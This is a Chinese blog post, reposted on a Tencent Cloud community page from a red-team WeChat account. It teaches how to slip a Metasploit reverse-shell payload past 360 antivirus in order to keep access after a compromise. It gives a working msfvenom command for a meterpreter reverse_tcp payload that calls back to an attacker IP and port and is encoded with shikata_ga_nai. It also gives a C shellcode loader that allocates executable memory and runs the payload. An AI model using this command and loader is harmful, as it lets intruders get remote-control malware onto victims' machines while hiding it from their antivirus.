前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Metasploit 生成 C 过免杀某60...

Metasploit 生成 C 过免杀某60...

作者头像
渗透攻击红队
发布2021-01-13 15:06:39
2K0
发布2021-01-13 15:06:39
举报
文章被收录于专栏:漏洞知识库漏洞知识库

在拿到一枚shell后,我们必须要做好权限维持,如果目标主机上有AV的话,我们一定要做好免杀处理,不能被发现!宁可不攻击也不要被发现,所以免杀是在内网渗透过程中最关键的一步!今天分享一个绕过某60的免杀技巧,总结就是:只要会代码,免杀随便绕!

Metasploit 生成 C 过免杀 360

Metasploit

Msf 相比大家都看过我直接写的笔记,大家也都会使用,这里也不一一细讲,直接上操作:

首先使用MSF的shikata_ga_nai构建x86一个shellcode:

代码语言:javascript
复制
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.12 LPORT=9090 -e x86/shikata_ga_nai -i 8 -f c > shell.c

然后使用 VC 编译(我用的是 VC 2019):

代码语言:javascript
复制
#include <stdio.h>
#include <windows.h>

unsigned const char payload[] = "这里是生成的shellcode";

size_t size = 0;

int main(int argc, char** argv) {

    char* code;

    printf("Hello Hack saul!\n");

    code = (char*)VirtualAlloc(NULL, size, MEM_COMMIT,PAGE_EXECUTE_READWRITE);

    memcpy(code, payload, size); 

    ((void(*)())code)();

    return(0);
}

字节可以改改,然后运行上线:

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2021-01-05,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 渗透攻击红队 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档